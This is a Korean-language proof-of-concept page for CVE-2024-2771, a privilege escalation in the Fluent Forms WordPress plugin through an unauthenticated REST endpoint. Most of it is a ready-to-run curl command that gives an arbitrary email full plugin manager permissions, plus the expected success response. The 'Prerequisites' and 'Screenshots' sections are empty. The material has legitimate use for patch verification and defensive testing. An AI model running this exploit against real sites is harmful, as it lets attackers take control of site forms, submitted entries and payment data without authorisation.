
CVE-2024-2771에 대한 개념 증명 익스플로잇, 인증되지 않은 REST API 엔드포인트를 통한 Fluent Forms WordPress 플러그인의 권한 상승 취약점입니다.
CVE-2024-2771 개념 증명 (Proof-of-Concept)
WordPress용 퀴즈, 설문조사 및 드래그 앤 드롭 WP 폼 빌더 플러그인인 Contact Form Plugin by Fluent Forms는 5.1.16 이하 모든 버전에서 /wp-json/fluentform/v1/managers REST API 엔드포인트에 대한 권한 검사 누락으로 인해 권한 상승에 취약합니다. 이를 통해 인증되지 않은 공격자가 Fluent Form 관리 권한을 가진 사용자를 생성할 수 있으며, 이로 인해 플러그인의 모든 설정과 기능에 접근할 수 있습니다. 또한 인증되지 않은 공격자가 관리자 계정을 삭제할 수도 있습니다.
전제 조건
익스플로잇 명령어
# 1. 임의의 이메일에 Fluent Forms 전체 권한 부여
curl -i -X POST "http://TARGET/wp-json/fluentform/v1/managers" \
-H "Content-Type: application/json" \
-d '{
"manager": {
"email": "[email protected]",
"permissions": [
"fluentform_dashboard_access",
"fluentform_forms_manager",
"fluentform_entries_viewer",
"fluentform_manage_entries",
"fluentform_view_payments",
"fluentform_manage_payments",
"fluentform_settings_manager",
"fluentform_full_access"
]
}
}'
예상 응답
HTTP/1.1 200 OK
{
"message": "Manager has been saved.",
"manager": {
"id": 2,
"email": "[email protected]",
"permissions": [
"fluentform_dashboard_access",
"fluentform_forms_manager",
"fluentform_entries_viewer",
"fluentform_manage_entries",
"fluentform_view_payments",
"fluentform_manage_payments",
"fluentform_settings_manager",
"fluentform_full_access"
]
}
}
스크린샷
